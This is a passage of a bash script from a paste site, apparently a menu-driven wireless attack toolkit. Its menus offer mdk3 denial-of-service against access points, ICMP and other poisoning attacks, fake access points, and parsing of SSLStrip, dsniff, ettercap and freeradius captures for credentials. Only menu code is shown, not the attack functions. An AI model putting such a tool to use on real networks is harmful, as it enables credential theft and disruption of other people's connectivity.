- 6) f_mainmenu ;;
- *) f_FakeAP-Menu ;;
- esac
- }
- ######################################################
- f_DoSOptions(){
- clear
- f_Banner
- echo "1. Attack a Single or Multiple APs"
- echo "2. Last Man Standing (Use with Caution)"
- echo "3. Previous Menu"
- echo
- read -p "Choice: " doschoice
- case $doschoice in
- 1) f_mdk3aps ;;
- 2) f_lastman ;;
- 3) f_fakeapattacks ;;
- *) f_DoSOptions ;;
- esac
- }
- ######################################################
- f_DataReviewMenu(){
- clear
- f_Banner
- echo "1. Parse SSLStrip log for credentials"
- echo "2. Parse dsniff file for credentials"
- echo "3. Parse ettercap eci file for credentials"
- echo "4. Parse freeradius attack file for credentials"
- echo "5. Previous Menu"
- echo
- read -p "Choice: " datareviewchoice
- case $datareviewchoice in
- 1) f_SSLStrip ;;
- 2) f_dsniff ;;
- 3) f_EtterLog ;;
- 4) f_freeradiuscreds ;;
- 5) f_mainmenu ;;
- *) f_DataReviewMenu ;;
- esac
- }
- ##################################################
- f_ICMP(){
- clear
- f_Banner
- echo "\n*** If you are connected to a switch this attack won't work! ***"
- echo -e "*** You must be able to see ALL traffic for this attack to work. ***\n\n"
- read -p "Are you connected to a switch [y/N]: " icmpswitch
- if [ $(echo $icmpswitch | tr 'A-Z' 'a-z') == "y" ]; then
- f_ICMPPoison
- else
- f_poisoning
- fi
- }
- ##################################################
- f_mainmenu(){
- clear
- f_Banner
- echo "1. Prerequisites & Configurations"
- echo "2. Poisoning Attacks"
- echo "3. FakeAP Attacks"
- echo "4. Data Review"
- echo "5. Exit"
- echo "q. Quit current poisoning session"
- echo
- read -p "Choice: " mainchoice
- case $mainchoice in
- 1) clean=; f_prereqs ;;
- 2) clean=; f_poisoning ;;
- 3) clean=; f_fakeapattacks ;;
- 4) clean=; f_DataReviewMenu ;;
- 5) f_checkexit ;;
- 1968) f_pbs ;;
- Q|q) f_Quit ;;
- *) f_mainmenu ;;
- esac
- }
- # run as root
- if [ "$(id -u)" != "0" ]; then
- echo -e "\e[1;31m[!] This script must be run as root\e[0m" 1>&2
- exit 1
- else
- mkdir /tmp/ec
- f_isxrunning
- f_xtermwindows
- f_findpaths
- clean=1
- f_mainmenu
- fi
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement